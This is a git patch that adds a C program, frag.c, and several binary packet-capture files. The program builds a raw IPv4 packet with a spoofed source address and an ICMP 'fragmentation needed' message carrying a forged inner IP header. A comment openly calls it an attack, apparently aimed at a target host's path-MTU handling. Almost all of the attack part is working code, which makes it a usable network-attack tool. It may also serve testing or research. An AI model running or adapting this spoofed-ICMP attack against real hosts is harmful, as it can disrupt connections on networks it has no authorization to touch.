From 58a2c14e3fc6c355074b4885baeab1a902559846 Mon Sep 17 00:00:00 2001
From: gbucchino <gbucchino@fortinet-us.com>
Date: Thu, 28 May 2026 16:34:46 +0200
Subject: [PATCH] upd

---
 foo.pcap       | Bin 0 -> 116 bytes
 frag.c         | 107 +++++++++++++++++++++++++++++++++++++++++++++++++
 frag.pcap      | Bin 0 -> 10512 bytes
 frag2.pcap     | Bin 0 -> 27768 bytes
 frag3.pcap     | Bin 0 -> 6104 bytes
 icmp.pcap      | Bin 0 -> 744 bytes
 icmp2.pcap     | Bin 0 -> 116 bytes
 icmp3.pcap     | Bin 0 -> 116 bytes
 icmp_frag.pcap | Bin 0 -> 116 bytes
 9 files changed, 107 insertions(+)
 create mode 100644 foo.pcap
 create mode 100644 frag.c
 create mode 100644 frag.pcap
 create mode 100644 frag2.pcap
 create mode 100644 frag3.pcap
 create mode 100644 icmp.pcap
 create mode 100644 icmp2.pcap
 create mode 100644 icmp3.pcap
 create mode 100644 icmp_frag.pcap

diff --git a/foo.pcap b/foo.pcap
new file mode 100644
index 0000000000000000000000000000000000000000..b13c809c35e56d0e6409d272d710e9ae8e28462d
GIT binary patch
literal 116
zcmca|c+)~A1{MYcU||qpWMIhuDwd_&%gf*clmKB4hyrE?Mg}&9fUw2>-3$z_3=9@5
qmlzoA8L!Vfu!4)}zzPv2X6A$KAf-S#8-a%m3=V%87+`XaPyhg?%olS2

literal 0
HcmV?d00001

diff --git a/frag.c b/frag.c
new file mode 100644
index 0000000..dc7a40f
--- /dev/null
+++ b/frag.c
@@ -0,0 +1,107 @@
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/ip_icmp.h>
+
+#define PACKET_SIZE  128
+#define PAYLOAD_DATA 8
+
+static unsigned short csum(unsigned short *buf, int nwords) {
+    unsigned long sum = 0;
+    while (nwords > 0) {
+        sum += *buf++;
+        nwords--;
+    }
+    sum = (sum >> 16) + (sum & 0xFFFF);
+    sum += (sum >> 16);
+    return (unsigned short)(~sum);
+}
+
+int main(int argc, char *argv[]) {
+    int sock = 0;
+
+    if (argc < 3)
+    	exit(1);
+
+    char ipsrc[15];
+    char ipdst[15];
+    memcpy(ipsrc, argv[1], 15);
+    memcpy(ipdst, argv[2], 15);
+
+    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+    if (sock < 0) {
+        perror("socket");
+        return 1;
+    }
+
+    int one = 1;
+    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(int)) < 0) {
+        perror("setsockopt");
+        return 1;
+    }
+
+    unsigned char packet[PACKET_SIZE];
+    memset(packet, 0, PACKET_SIZE);
+
+    struct iphdr *ip = (struct iphdr *)packet;
+    struct icmphdr *icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
+
+    struct sockaddr_in dst = {0};
+    dst.sin_family = AF_INET;
+    inet_pton(AF_INET, ipdst, &dst.sin_addr);
+
+    ip->version = 4;
+    ip->ihl = 5;
+    ip->tos = 0;
+    ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 28);
+    ip->id = htons(1);
+    ip->frag_off = 0;
+    ip->ttl = 64;
+    ip->protocol = IPPROTO_ICMP;
+    ip->saddr = inet_addr(ipsrc);
+    ip->daddr = dst.sin_addr.s_addr;
+    ip->check = csum((unsigned short *)ip, sizeof(struct iphdr) / 2);
+
+    /* To perform the attack, we need to set these two values */
+    icmp->type = ICMP_DEST_UNREACH;
+    icmp->code = ICMP_FRAG_NEEDED;
+
+    icmp->un.gateway = 0;
+
+    /* We construct the payload for the ICMP */
+    unsigned char *payload = packet + sizeof(struct iphdr) + sizeof(struct icmphdr);
+
+    struct iphdr payload_ip;
+    memset(&payload_ip, 0, sizeof(payload_ip));
+    payload_ip.version = 4;
+    payload_ip.ihl = 5;
+    payload_ip.tos = 0;
+    payload_ip.tot_len = htons(60);
+    payload_ip.id = htons(1);
+    payload_ip.ttl = 64;
+    payload_ip.protocol =  0;
+    payload_ip.saddr = inet_addr(ipsrc);
+    payload_ip.daddr = inet_addr(ipdst);
+
+    /* We copy our IP header into the ICMP payload and our data */
+    memcpy(payload, &payload_ip, sizeof(payload_ip));
+    memset(payload + sizeof(payload_ip), 0x41, PAYLOAD_DATA);
+
+    int icmp_len = sizeof(struct icmphdr) + sizeof(payload_ip) + PAYLOAD_DATA;
+    icmp->checksum = 0;
+    icmp->checksum = csum((unsigned short *)icmp, (icmp_len + 1) / 2);
+
+    int total_len = sizeof(struct iphdr) + icmp_len;
+    
+    if (sendto(sock, packet, total_len, 0, (struct sockaddr *)&dst, sizeof(dst)) < 0) {
+        perror("sendto");
+        return 1;
+    }
+
+    close(sock);
+    return 0;
+}
diff --git a/frag.pcap b/frag.pcap
new file mode 100644
index 0000000000000000000000000000000000000000..27b4504c74bbd55f0cccaa5da243cec1fcc8eaeb
GIT binary patch
literal 10512
zcmeI1c~neM9LMi_Go~qJE3!nBUAAP;GMSN`7A>~yk(h+CWZxnsTcxs<EMq51$r7W+
zIzrZvYV2ewgu?y3&O0;5nLqk()VuGT-+yz@d2i->Ki~VAm!(LEqY)ozE<Q4&5K7N8
z_fZ+rsF;VC5te;`hbSaKPVVuJAqY7jo;u1^gv6A{FHLSlr^(G|Axd>brig;|u*AlM
zW>(gyS<BR{b{+G&_3AgUXxPY7WYxGy(`L<Ev}|SFx=q`5?QJ^PcI?!-OV@7Q?Rxa=
z)mv=eM<VU((69f1frADQ89L0-$=PMNtDC#Wh>@d4kMSHkZv2FalO}sjnd&{wXZj48
z?@Yg0v*-8+%$+xXLEyqgi<c~2wtU6PRjY&6tPNfl61qNY!^TaUw}eMTZjFkL*|vSh
z&Rwx_yW{ul-M3$U;NYRdM~)slej?%Isl=qy$th=2&z?JfA?@NN#pU!2<&~?~uHU$+
zx|MnR&fTng_a8ib^f>#;(`Px)bMx}mFJ8WS{pRhv_a6#Ae){~Su;}Zz@5MiU{wgW`
z{RdGrk6%S#AT%_pYHU)iI(dHb`&Y#L!#>Wz91!7c45OO^v@zyDpqR2!u^b@#hMU}g
zyyW7%$T9U{bms+yN4cUDF(ox%^P+Fw!hM(M>^nZwcPi(yzLUg=kUbS(4P6KKj*x=%
z9qBvL_m$+l0~`?GZ5@kuHjIW}+8m%mB{3+_o{AK*93Xwi&A!ujZ)M=TdU}<^(`1aN
zd9ZyeM1n%>X*8?{LCg2XVaFHo6yhlr(Nnn2U)aY!m;>NwFq+=d{=Wu$nvC(ZM3w_w
z|K7Oz{E!zJ&I>pijPAT(Pm_VCNebA!{11H>rnB#~&u2WfL@C0a=3mO5&k(9c`i^)S
z@w7_fX~3^!%mHvT7!AL)Ie<M)37!^_&2oUNyw^9kx&A&!iSz2FD2JzIf~Q#)v3)B<
zw&B>*c(5M)EGYwr9bd%Lh^G-xt9b8|VIO;A4uGS<XnN}(Ps?OH&4uLv=`C*lzX*Bp
z#d!fogVCKA>}i>dr-iV2(Rbg&eFy98JMHrsPc5|&fv3sY^BF>Rr0<BQ5l^cmo(3F<
f#vA}ggVFFyn*(&H)PnJ}AeIB9@3`4_`tGg2>H+*>

literal 0
HcmV?d00001

diff --git a/frag2.pcap b/frag2.pcap
new file mode 100644
index 0000000000000000000000000000000000000000..862ca8a52ddde76b209658a33303afba91c06f14
GIT binary patch
literal 27768
zcmeI3d013c7>Ccfcd$V%3&x#gN-W!~q`jOoS)^sTq!Mk|YN?eKwo#_GfW>H8WGot*
z)r?AIYLHooX^<^gYNkbIHKmpcVwovr-*?CJp!e`R!+&?U^WEn;|8eIzz?t8Bf8RT^
ze&wP$8gsCw%fVcnv93EhkD1ydmet2FV>v@Vpfk?eup#Ml(<>NDV==W=8E)p~by<~x
zwpwMtr8!w<Z{}hg@5fvEq{JF`9(!C|ysKlU&Rx28>z<I9l<YqKgdQn9PdusD$)}up
z+UdQ|IP<JNsb`;a?s?~5aN$K4_w@+xCH*eFEba3C1FpDo;8j--8a!m^HN%FFNWV7Y
zy6bPa@utj?H{WvWZMWYs>dw1Hj~RRSJ@<~g@BRm}#y|Mb!;d_g{n+CZo|rgk@{><J
z{Y*~olxLsI^G%)h{0q}xd@29s8Lt!+78TE&^=irNIj_xq{f#&MfqC;6l)m-$I}6`k
zw0OyTW##WL{b1RLA5|=`T=DVBRi9K<f4cg!&%gMxX3bY$uU)tPn+@M?-1Ob|wLfhB
zam!CX{}TN5x2@Z@|Nh60oxAGlcQ@?$^RK;s@B3%}fyRITJIJ`EJ7U@#<&16HuKm%+
zbfDj#{{M9T>HXhY@(=TS8svWf(i>Ov`OosJGT2ftcj+?!t<Fu{_d?kBKAjos(7qjv
zI}C0O&O>hLLFAU;4P)iLiCe@i;<kOBTQCQfK@PYzW~}COKx+><kS+M0)iMX@c`rJj
zck#SbsJt_ABg8wwJ4O`ma-n0XybJZTnxP@y6_jF6OYVXl4bM7bqo}7*Poth{lb(+G
zH3f2DHoUWOHSzB79MF6Pr7YXa#a@{M#JlL^T_p6h87jA6z8LCh`DIPq65LJPqWL1t
zS8X_7Ms6)oxn;_M5Vr*P61T`pSn6fE!Fk=}X@M8>W8bPvk#hwnD~SUyrs4f4#OmQS
z@FFinUWmL9d7;+gg{<xkR(~!)=6?XP8`q(pZTegU%nAMI#p0L9{I~k=hWke5sB=P-
z7XxmA7fX=)CT@`zBQItjFJ?S{iWYb=zv0EQWe(7sFgoXicwRI(FDBlpUJQ6AxGSP~
zR|fl5d3X3cTn`rJU{6c($ay$pe(GuD#mI}<#EW5ml|v4M^J0ZLh8Kh9-jE+B-bE+x
zBB7_PQn_WChljW&crtN|ycl^g8+tM1R*lLnQx0f8<Q8}_;ud)^OTAckIIsO@w!n)u
zV&B@eM$Q$SY{O#kVmjWBKCB#G126Jo<i*H~kryK`);hi~i}^hOvfDH#RJ~ZE;l)PE
z{I|Mq;l49r-|C#u<i&tng72=D`zCIY7b7obA1{VEFadJF9q#*LjfNNNDRY44gwZ)C
z#Pc#q<(=xqfOp`<B8qndXEn#WBfVHrD)zL*>2e;<*k<Z!<i*H~*~E)sehq>g2<OF$
zQqhZf#>pHY-bE+xBB7^^R=H)GhwDM)mf%UmE%IXI#cb%skXyMbw@f*p`H)+J3*r`e
zF-yHz0-V>Z{o%b>buIR-opo}q;AHJafERP%{piCc!)xG0UW~jLc`@>0<i%Qt7sLD>
z57`~gi&fX67mJ%H^WW;eh5OEfeTVa6$SuL^x5|AJx5$f;7qgES!yNEK4utb!kOR=S
z8q#DA(3~(j=Y)7(=BvC@ycqIM@c4-0-P!}q@$N`3R;*)BOIRW2;f%#oPa`izUd$$5
z4D)Lp<UlwtR;;5J>sumofOr?3yo-dMwo&DlX&$Zzkz0Z%61T{Ukr%U}7ej7sQMqNx
S0nLZp65K=FA}?mC7yBPBJYQu1

literal 0
HcmV?d00001

diff --git a/frag3.pcap b/frag3.pcap
new file mode 100644
index 0000000000000000000000000000000000000000..be61bf0c60634a6d7e71d4cbb71618dce63b7606
GIT binary patch
literal 6104
zcmca|c+)~A1{MYcU||qpWMGi|E}o^afrsG-GXofNKol@DFfy<)1cWUP+sDA*%E0{O
zaHj%;1LGH~11q?g4y+Ji;$U#y$e_r;2+|MI!nvLYtW!WxNLWNvOk6@zN?Jx%PF_J#
zNm)fzO<hA%OIt@*Pv5}M$k@cx%-q7#%G$=(&fdY%$=Su#&E3P(%iG7-&p#kAC^#fE
zEIcAIDmo@ME<PbKDLExIEj=SMD?2AQFTbF$sJNuGth}PKs=B7OuD+qMskx=Kt-YhO
ztGlPSuYbbCNt35coi=^O%vrPN%$+xX!NNt0mn>bje8tLDtJkbuw|>LMO`ErD-L`$l
z&Rx6r?A^Ejz`;X@j~qRA{KUyqr_Y={cmBe~OP8-)y>|V^&0Dwc+`V`I!NW(7pFDl`
z{Kd;xuiw0V_x{7jPoKYh{r3IG&tJd){QdWzfsu)sg_Vt+gOiJ!hnJ6k)c>RLKNQnH
zC?9JA%YhrfG696KmjjGP4tFwCIWUSogp~uM`DSR98=!c$#w_ny7#LZ=<-LD5qP(|f
z{5o3RkCykN_1!S6??L52C}w$&Rt`YQdwWK)(ei$Xwi7||%)Ak!eGiOhNc;X=Af&vX
zyA{;Fm*NMt?Ll=r1B35q`+l^2Kia<;CjC25Iluxe2hiI0XypLok-1wz?R)F3uySCu
zeLwWt_X3#ZJ#ah+(!QUv4N>0PGfIz^_oMCm(f0i?ZQsjbmiK7o0HnOPXS5kD?}upn
F9so-2;Hm%s

literal 0
HcmV?d00001

diff --git a/icmp.pcap b/icmp.pcap
new file mode 100644
index 0000000000000000000000000000000000000000..9464ec4632140a49d22334d3013e01a2fa815eea
GIT binary patch
literal 744
zcmca|c+)~A1{MYcU||qpWMD{qBbN1I1}{SfPy&QGAPSfn7#Y|Y0>T#icQY`!GBAYH
z-*jNGXOyWvu!4)}zzPv24u<_%4Ezj?ApIaMU!r-zIt2uUghfQf#3dx9q-A8~<P{W^
zlvPyK)HO7<v~_g#^bHJ+j7?0<%t87rXJWIL1#IuRK#09N&M`1JFe<fy>;&1(z;K)*
zdy|0nR?NX>FRFhV(n0=}ev9z$zZ9T<nLzqM9^H~antwt1CS$c1)xSG|{s#J&8R1{H
zR7&hk2HMMikg$Injlup^MEIBA0cbBXNI%HGi&{wYFG!y*R(sL>TLtp3;w^-K#VN8E
E03e`(9RL6T

literal 0
HcmV?d00001

diff --git a/icmp2.pcap b/icmp2.pcap
new file mode 100644
index 0000000000000000000000000000000000000000..7f9bb7eb2c327129226b3a9e1d8605901e112abc
GIT binary patch
literal 116
zcmca|c+)~A1{MYcU||qpWMDY)Ml9>L2NQ!2Py&QGAPSfn7#Y|Y0>T#icQY`!GB8*G
o`3&}qck&Oc;9@$kLWGH#<)<(M1M>@@oD4|L;qR?}m>kRw0KA|UBLDyZ

literal 0
HcmV?d00001

diff --git a/icmp3.pcap b/icmp3.pcap
new file mode 100644
index 0000000000000000000000000000000000000000..c2fd7dbb36cb3b35f6cf52bac7aa3c52f549c612
GIT binary patch
literal 116
zcmca|c+)~A1{MYcU||qpWMKIJUMx%FI46S-Py&QGAPSfn7#Y|Y0>T#icQY`!GB8*G
o`3&}qck&Oc;9@$kLWGH#<<D=BQlOj+NY3H!t$vss#0Ulk0L2^@FaQ7m

literal 0
HcmV?d00001

diff --git a/icmp_frag.pcap b/icmp_frag.pcap
new file mode 100644
index 0000000000000000000000000000000000000000..39e3012790afa6fa77094adeb3d302c3f4617806
GIT binary patch
literal 116
zcmca|c+)~A1{MYcU||qpWMKGZFOlW<mw~|tC;`G85Ctp@j0|iH0bz^7_AxNHGB8*G
k`3w$>PYVvL;9>$|MrM{fSs<lAIUBItF9rsfoFfzf0E@O33jhEB

literal 0
HcmV?d00001